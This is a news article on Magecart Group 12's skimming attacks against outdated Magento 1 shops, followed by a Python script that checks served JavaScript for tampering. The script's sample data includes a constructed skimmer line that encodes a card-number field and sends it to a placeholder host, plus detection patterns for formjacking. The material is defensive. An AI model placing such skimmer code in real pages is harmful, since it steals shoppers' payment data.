Hackers attacked E-Shop Retailers operating outmoded Magento software

November 13, 2020

Security researchers have recently uncovered a sudden surge in cybercriminal activity against a large number of online businesses: more than 2,800, to be exact.


These e-commerce merchants have one thing in common – they are all running an outdated version of the Magento platform.


The attacks have been going on since September. Security researchers who have been watching them closely suspect that a particular group is most likely behind the chain of online assaults.

Other analysts have also observed several supply chain attacks that compromised numerous e-commerce websites at once. These Magecart attacks, like the earlier Adverline incident, exploited the same outdated Magento software (unsupported since June 2020) that the victim merchants were running. The simultaneous attacks were dubbed “CardBleed,” a recently documented campaign that abuses the “Magento Connect” function to install a malicious file named “mysql.php,” which deletes itself as soon as the skimmer code has been added to “prototype.js.”

Magecart Group 12 is a highly organized hacking syndicate that has consistently succeeded in its operations; it is also the group that attacked the Olympics online ticket resellers in February of this year. Online skimming has always been its bread and butter: the tried-and-tested technique of “formjacking,” in which JavaScript code captures credit card details in real time and transmits them directly to encrypted servers under the group’s control. The group has made several “upgrades” to its operations, embedding card-stealer code within an image file’s metadata, performing homograph attacks, and hiding skimmers inside a targeted website’s favicon file.

The group was also credited with the Ant and Cockroach skimmer attacks of August last year, including the Magento favicon attack on the website “myicons(dot)net,” where skimmer code was hidden in fake payment form pages to steal customers’ personal and credit card details. As soon as one hacking operation is shut down, another comes into play, so the skimming activity never stops. Security researchers stated that ever since CardBleed was discovered and made public, the group has scrambled to make sure its entire operation stays mobile and undetected: its principal skimmer code and exfiltration process were moved from ajaxcloudflare(dot)com to a recently registered domain, consoler(dot)in.

These efforts have led researchers to conclude that the group is continuously evolving, inventing new skimming methods and new ways to avoid detection. Given that Magento 1 is all but obsolete, the only logical mitigation is to upgrade to Magento 2. That, together with stronger infrastructure security and other safety measures, should help keep e-commerce platforms and the online businesses that rely on them operational and safe from attack.
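One of the “other safety measures” a shop can add is a baseline integrity check on the JavaScript it serves, which would catch the prototype.js tampering and the swap of exfiltration domains described above. The script below is an added example, not code from the article, from Magento or from any vendor; the asset paths, allowed hosts, file contents and the `skimmer.invalid` host are all constructed for illustration.

```python
"""Added example (not the article's, Magento's or any vendor's code): a baseline
integrity check for served storefront JavaScript, aimed at the prototype.js
tampering described above. Paths, hosts and file contents are constructed."""
import hashlib
import re

# Hosts the storefront legitimately talks to (constructed allowlist).
ALLOWED_HOSTS = {"shop.example", "cdn.shop.example"}
HOST_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

# Traits that co-occur in formjacking code: reading field values, encoding
# them, sending them out. Any one alone is normal; all three merit a look.
TRAITS = {
    "reads_inputs": re.compile(r"\.value\b|FormData\("),
    "encodes": re.compile(r"\bbtoa\(|encodeURIComponent\("),
    "sends": re.compile(r"\bfetch\(|XMLHttpRequest|sendBeacon\(|new Image\("),
}

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def build_baseline(assets: dict) -> dict:
    """Record known-good hashes right after a clean deploy."""
    return {path: sha256_hex(content) for path, content in assets.items()}

def check_asset(path: str, content: bytes, baseline: dict) -> list:
    """Compare one asset with the baseline and scan its body; [] means nothing flagged."""
    findings = []
    expected = baseline.get(path)
    if expected is None:
        findings.append(f"{path}: not in baseline manifest")
    elif sha256_hex(content) != expected:
        findings.append(f"{path}: content differs from deployed baseline")
    text = content.decode("utf-8", errors="replace")
    for host in sorted({h.lower() for h in HOST_RE.findall(text)}):
        if host not in ALLOWED_HOSTS:
            findings.append(f"{path}: references unexpected host {host}")
    if all(rx.search(text) for rx in TRAITS.values()):
        findings.append(f"{path}: reads, encodes and sends form data")
    return findings

# Constructed sample: a known-good stub and a tampered copy of the same file.
CLEAN_JS = b"var Prototype={Version:'1.7'};function $(id){return document.getElementById(id);}"
TAMPERED_JS = CLEAN_JS + (b"\n(function(){var d=btoa(document.forms[0]['cc_number'].value);"
                          b"new Image().src='https://skimmer.invalid/c?d='+d;})();")
BASELINE = build_baseline({"js/prototype/prototype.js": CLEAN_JS})

if __name__ == "__main__":
    for name, body in (("clean", CLEAN_JS), ("tampered", TAMPERED_JS)):
        print(name, check_asset("js/prototype/prototype.js", body, BASELINE) or ["ok"])
```

Run it from a scheduled job against the files the web server actually serves (not just the files on disk), since the article describes the injected code arriving through a web-accessible component rather than a normal deploy.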
